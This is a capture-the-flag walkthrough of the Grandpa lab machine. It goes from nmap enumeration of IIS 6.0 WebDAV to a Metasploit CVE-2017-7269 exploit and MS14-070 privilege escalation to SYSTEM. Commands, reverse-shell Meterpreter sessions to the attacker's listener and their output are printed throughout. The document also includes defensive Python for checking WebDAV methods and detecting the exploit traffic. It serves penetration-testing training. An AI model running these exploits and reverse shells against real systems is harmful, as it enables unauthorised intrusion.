Grandpa is a relatively straightforward box that tests the user’s ability to enumerate with NMAP and exploit with Metasploit. Although the initial compromise is reached differently than on Granny, the privilege escalation process is identical.

Step 1: Enumerate with NMAP

As usual, our first step in the investigation is scanning the target with NMAP to check for any exposed ports and services. -A turns on version detection, the default NSE scripts and traceroute (and OS detection when run as root); -Pn skips host discovery, which matters here because the host does not answer pings and would otherwise be reported as down.

➜  grandpa nmap -vv -A 10.129.93.230 -Pn      
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-25 00:02 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:02
Completed Parallel DNS resolution of 1 host. at 00:02, 0.00s elapsed
Initiating Connect Scan at 00:02
Scanning 10.129.93.230 [1000 ports]
Discovered open port 80/tcp on 10.129.93.230
Completed Connect Scan at 00:03, 8.59s elapsed (1000 total ports)
Initiating Service scan at 00:03
Scanning 1 service on 10.129.93.230
Completed Service scan at 00:03, 6.06s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.93.230.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 5.04s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 0.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 0.00s elapsed
Nmap scan report for 10.129.93.230
Host is up, received user-set (0.027s latency).
Scanned at 2023-01-25 00:02:59 EST for 20s
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Microsoft IIS httpd 6.0
| http-ntlm-info: 
|   Target_Name: GRANPA
|   NetBIOS_Domain_Name: GRANPA
|   NetBIOS_Computer_Name: GRANPA
|   DNS_Domain_Name: granpa
|   DNS_Computer_Name: granpa
|_  Product_Version: 5.2.3790
| http-webdav-scan: 
|   Server Date: Wed, 25 Jan 2023 05:03:14 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_  Server Type: Microsoft-IIS/6.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.15 seconds

Port 80 is the only open TCP port; the other 999 are filtered, so something in front of the host is dropping packets. The banner identifies Microsoft IIS 6.0, and http-ntlm-info reports Product_Version 5.2.3790, i.e. Windows Server 2003, a long-unsupported platform. WebDAV is enabled, as on the previous box we rooted, Granny, but note the two method lists: the Allow header (Allowed Methods) for / contains only read-type methods plus COPY, LOCK and UNLOCK, while the Public header advertises PUT, DELETE, MOVE and MKCOL as implemented. Writes via PUT and MOVE are advertised but not granted on the root, so the upload-and-rename route used on Granny is unlikely to work here. Let’s search Metasploit for exploits against IIS 6 WebDAV instead.
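The Allow versus Public distinction is worth checking programmatically whenever an OPTIONS response is in hand. The following Python is an added example, not part of the original writeup: it parses a constructed OPTIONS response that mirrors the headers nmap reported for this host and reports which methods are merely advertised, which are actually permitted on the requested path, and whether the PUT-then-MOVE upload used on Granny is available.

```python
"""Compare the Allow and Public headers of a WebDAV OPTIONS response.

nmap's http-webdav-scan reports both: "Allowed Methods" comes from the Allow
header (what the server permits on the requested path) and "Public Options"
from the Public header (what the server implements at all). A method listed
only in Public is advertised but refused on that path, which is exactly the
gap between Granny (PUT/MOVE usable) and Grandpa (PUT/MOVE advertised only).

Added example; not part of the original writeup. SAMPLE_OPTIONS_RESPONSE is a
constructed response that mirrors the headers nmap reported for 10.129.93.230.
"""

# Methods that let a client create, rename, delete or lock content. A WebDAV
# server that permits any of these unauthenticated is a write target.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Date: Wed, 25 Jan 2023 05:03:14 GMT\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "DAV: 1, 2\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> dict:
    """Return header name (lower-cased) -> value for a raw HTTP response head."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def method_list(value: str) -> set:
    """Split a comma-separated method header into an upper-cased set."""
    return {m.strip().upper() for m in value.split(",") if m.strip()}


def webdav_method_report(raw_response: str) -> dict:
    """Classify the methods an OPTIONS response advertises versus permits."""
    h = parse_headers(raw_response)
    allowed = method_list(h.get("allow", ""))
    public = method_list(h.get("public", ""))
    return {
        "allowed": allowed,
        "public": public,
        "advertised_only": public - allowed,      # implemented, refused on this path
        "writable_here": allowed & WRITE_METHODS,  # write-type methods actually granted
        "upload_and_rename_possible": {"PUT", "MOVE"} <= allowed,
    }


if __name__ == "__main__":
    report = webdav_method_report(SAMPLE_OPTIONS_RESPONSE)
    for key, value in report.items():
        print(f"{key}: {sorted(value) if isinstance(value, set) else value}")
```

Run against a live target, the raw response would come from sending `OPTIONS <path> HTTP/1.1` over a socket; the classification is per path, so repeat it for any directory the server exposes, since IIS can grant PUT on a subdirectory that it refuses on the root.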

Step 2: Initial Exploit with Metasploit

Let’s search metasploit for relevant exploits:

➜  grandpa msfconsole 
						  
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v6.2.37-dev-                         ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post       ]
+ -- --=[ 948 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use the resource command to run 
commands from a file
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search webdav

Matching Modules
================

   #   Name                                                      Disclosure Date  Rank       Check  Description
   -   ----                                                      ---------------  ----       -----  -----------
   0   exploit/osx/browser/safari_file_policy                    2011-10-12       normal     No     Apple Safari file:// Arbitrary Code Execution
   1   exploit/windows/misc/vmhgfs_webdav_dll_sideload           2016-08-05       normal     No     DLL Side Loading Vulnerability in VMware Host Guest Client Redirector
   2   exploit/windows/scada/ge_proficy_cimplicity_gefebt        2014-01-23       excellent  Yes    GE Proficy CIMPLICITY gefebt.exe Remote Code Execution
   3   auxiliary/scanner/http/webdav_internal_ip                                  normal     No     HTTP WebDAV Internal IP Scanner
   4   auxiliary/scanner/http/webdav_scanner                                      normal     No     HTTP WebDAV Scanner
   5   auxiliary/scanner/http/webdav_website_content                              normal     No     HTTP WebDAV Website Content Scanner
   6   exploit/windows/misc/ibm_director_cim_dllinject           2009-03-10       excellent  Yes    IBM System Director Agent DLL Injection
   7   exploit/windows/browser/keyhelp_launchtripane_exec        2012-06-26       excellent  No     KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability
   8   exploit/windows/iis/ms03_007_ntdll_webdav                 2003-05-30       great      Yes    MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
   9   exploit/windows/ssl/ms04_011_pct                          2004-04-13       average    No     MS04-011 Microsoft Private Communications Transport Overflow
   10  auxiliary/scanner/http/dir_webdav_unicode_bypass                           normal     No     MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
   11  auxiliary/scanner/http/ms09_020_webdav_unicode_bypass                      normal     No     MS09-020 IIS6 WebDAV Unicode Authentication Bypass
   12  exploit/windows/browser/ms10_022_ie_vbscript_winhlp32     2010-02-26       great      No     MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
   13  exploit/windows/local/ms16_016_webdav                     2016-02-09       excellent  Yes    MS16-016 mrxdav.sys WebDav Local Privilege Escalation
   14  exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec     2010-06-09       excellent  No     Microsoft Help Center XSS and Command Execution
   15  exploit/windows/iis/iis_webdav_upload_asp                 2004-12-31       excellent  No     Microsoft IIS WebDAV Write Access Code Execution
   16  exploit/windows/iis/iis_webdav_scstoragepathfromurl       2017-03-26       manual     Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow
   17  exploit/windows/browser/ms10_046_shortcut_icon_dllloader  2010-07-16       excellent  No     Microsoft Windows Shell LNK Code Execution
   18  exploit/windows/browser/oracle_webcenter_checkoutandopen  2013-04-16       excellent  No     Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution
   19  exploit/windows/http/sap_host_control_cmd_exec            2012-08-14       average    Yes    SAP NetWeaver HostControl Command Injection
   20  exploit/windows/misc/webdav_delivery                      1999-01-01       manual     No     Serve DLL via webdav server
   21  exploit/multi/svn/svnserve_date                           2004-05-19       average    No     Subversion Date Svnserve
   22  exploit/multi/http/sun_jsws_dav_options                   2010-01-20       great      Yes    Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
   23  exploit/windows/browser/java_ws_double_quote              2012-10-16       excellent  No     Sun Java Web Start Double Quote Injection
   24  exploit/windows/browser/java_ws_arginject_altjvm          2010-04-09       excellent  No     Sun Java Web Start Plugin Command Line Argument Injection
   25  exploit/windows/browser/java_ws_vmargs                    2012-02-14       excellent  No     Sun Java Web Start Plugin Command Line Argument Injection
   26  exploit/windows/browser/ubisoft_uplay_cmd_exec            2012-07-29       normal     No     Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
   27  exploit/windows/browser/webdav_dll_hijacker               2010-08-18       manual     No     WebDAV Application DLL Hijacker
   28  exploit/windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      No     Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
   29  post/windows/escalate/droplnk                                              normal     No     Windows Escalate SMB Icon LNK Dropper
   30  exploit/windows/http/xampp_webdav_upload_php              2012-01-14       excellent  No     XAMPP WebDAV PHP Upload


Interact with a module by name or index. For example info 30, use 30 or use exploit/windows/http/xampp_webdav_upload_php

msf6 > use 16
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Index 16 is exploit/windows/iis/iis_webdav_scstoragepathfromurl, the IIS 6.0 WebDAV ScStoragePathFromUrl buffer overflow (CVE-2017-7269). We are presented with a number of candidate modules and try several of them first, but this is the one that makes progress; the WebDAV upload module that works on Granny depends on PUT and MOVE, which the Allow header above does not grant for /.

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         10.129.93.230    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.86      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.86:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (175686 bytes) to 10.129.93.230
[*] Meterpreter session 2 opened (10.10.14.86:4444 -> 10.129.93.230:1039) at 2023-01-25 00:18:51 -0500

LHOST and LPORT were set before the run shown above. The module brute-forces the length of the web root’s physical path (MINPATHLENGTH to MAXPATHLENGTH, 3 to 60 here) because the overflow has to line up against it; once it hits the right length the stager lands and a Meterpreter session opens. The session is numbered 2 because an earlier attempt already consumed session 1.
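From the defender’s side, the exploit run above has a recognisable shape on the wire. The following Python is an added example, not code from the writeup or from Metasploit: it flags PROPFIND requests whose If: header carries an oversized <http://...> tag, the trigger CVE-2017-7269 describes, and groups hits by source so that the module’s path-length brute force stands out as a burst. The traffic is constructed, and the 512-byte tag limit is an assumption.

```python
"""Flag PROPFIND requests shaped like the IIS 6.0 WebDAV ScStoragePathFromUrl
overflow (CVE-2017-7269), the bug the module above exploits.

Per the CVE, the trigger is a PROPFIND request whose If: header begins with
"<http://" and is far longer than any legitimate tagged-list lock token.
The Metasploit module also walks physical path lengths 3..60, so a live
attempt shows up as a burst of such requests from one source.

Added example, not code from the writeup or from Metasploit. The traffic
below is constructed, and IF_TAG_LIMIT is an assumption.
"""
import re
from collections import Counter

IF_TAG_LIMIT = 512   # assumption: genuine If: tagged URLs are tens of bytes, not hundreds
TAG_RE = re.compile(r"<(http://[^>]*)>")


def parse_request(raw: str):
    """Return (method, path, headers) from a raw HTTP request head; names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_scstorage_shaped(raw: str) -> bool:
    """True for a PROPFIND whose If: header carries an oversized <http://...> tag."""
    method, _path, headers = parse_request(raw)
    if method != "PROPFIND":
        return False
    tags = TAG_RE.findall(headers.get("if", ""))
    if not tags:
        return False
    return max(len(t) for t in tags) > IF_TAG_LIMIT


def exploit_bursts(traffic, min_hits: int = 3) -> dict:
    """Map source -> count for sources that sent min_hits or more shaped requests.

    traffic is an iterable of (source_ip, raw_request) pairs, e.g. from a proxy
    log or reassembled pcap (the capture step is not shown here).
    """
    hits = Counter(src for src, raw in traffic if is_scstorage_shaped(raw))
    return {src: n for src, n in hits.items() if n >= min_hits}


# --- constructed samples (not captured traffic) ---------------------------
def constructed_attack(padding: int) -> str:
    """An exploit-shaped PROPFIND; padding varies the tag length as a brute force would."""
    tag = "http://localhost/" + "A" * (1000 + padding)
    return (
        "PROPFIND / HTTP/1.1\r\n"
        "Host: 10.129.93.230\r\n"
        f"If: <{tag}> (Not <locktoken:write1>)\r\n"
        "Content-Length: 0\r\n\r\n"
    )


BENIGN_PROPFIND = (
    "PROPFIND /docs/ HTTP/1.1\r\n"
    "Host: 10.129.93.230\r\n"
    "Depth: 1\r\n"
    "If: <http://10.129.93.230/docs/> (<opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>)\r\n"
    "Content-Length: 0\r\n\r\n"
)

BENIGN_GET = "GET / HTTP/1.1\r\nHost: 10.129.93.230\r\n\r\n"

SAMPLE_TRAFFIC = [
    ("10.10.14.5", BENIGN_GET),
    ("10.10.14.5", BENIGN_PROPFIND),
] + [("10.10.14.86", constructed_attack(n)) for n in range(4)]


if __name__ == "__main__":
    for src, raw in SAMPLE_TRAFFIC:
        print(src, raw.split("\r\n", 1)[0], "->", is_scstorage_shaped(raw))
    print("bursts:", exploit_bursts(SAMPLE_TRAFFIC))
```

IIS 6 does not log request headers by default, so this check needs a proxy, IDS or packet capture in front of the server; a single oversized If: header is already worth an alert, and the burst view is there to separate a scanner probing once from a module working through path lengths.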

Step 3: Migrating Processes

We now need to migrate out of the process the exploit landed in. The process list below shows our payload in rundll32.exe (PID 2740), a child of the IIS worker process w3wp.exe (PID 3084); if IIS recycles that worker, the child and our session go with it. davcdata.exe (PID 2724) is another long-running process owned by NT AUTHORITY\NETWORK SERVICE, so moving into it keeps the same privileges in a process that is less likely to be torn down.

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.exe
 392   344   services.exe
 404   344   lsass.exe
 584   392   svchost.exe
 668   392   svchost.exe
 732   392   svchost.exe
 752   392   svchost.exe
 796   392   svchost.exe
 988   392   spoolsv.exe
 1016  392   msdtc.exe
 1088  392   cisvc.exe
 1136  392   svchost.exe
 1192  392   inetinfo.exe
 1228  392   svchost.exe
 1332  392   VGAuthService.exe
 1404  392   vmtoolsd.exe
 1508  392   svchost.exe
 1612  392   svchost.exe
 1792  392   dllhost.exe
 1960  392   alg.exe
 1988  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2288  584   wmiprvse.exe
 2644  344   logon.scr
 2724  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2740  3084  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 3084  1508  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 3876  1088  cidaemon.exe
 3920  1088  cidaemon.exe
 3948  1088  cidaemon.exe

meterpreter > migrate -P 2724
[*] Migrating from 2740 to 2724...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

We were able to migrate to the davcdata.exe process, which runs as NT AUTHORITY\NETWORK SERVICE, and getuid confirms the context. We now need to escalate our privileges.

Step 4: Escalating Privileges

We can use the same exploit that we used to escalate privileges on Granny: both boxes are Windows Server 2003 SP2 hosts, so the same kernel bug applies. MS14-070 (CVE-2014-4076) is an IOCTL handling flaw in tcpip.sys that lets a local user run code as SYSTEM. Background the Meterpreter session with Ctrl-Z and load the local exploit. Note that the module’s SESSION option defaults to 1; our only live session is 2, so it must be set explicitly or the run will fail.

meterpreter > 
Background session 2? [y/N]  
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_070_tcpip_ioctl 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.86      yes       The listen address (an interface may be specified)
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  2         meterpreter x86/windows  NT AUTHORITY\NETWORK SERVICE @ GRANPA  10.10.14.86:4444 -> 10.129.93.230:1039 (10.129.93.230)

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 2
session => 2
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.86:4445 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175686 bytes) to 10.129.93.230
[*] Meterpreter session 3 opened (10.10.14.86:4445 -> 10.129.93.230:1040) at 2023-01-25 00:20:12 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We now run as NT AUTHORITY\SYSTEM, the highest local privilege on the box. The only remaining step is to collect the flags from the relevant users’ desktops and submit them.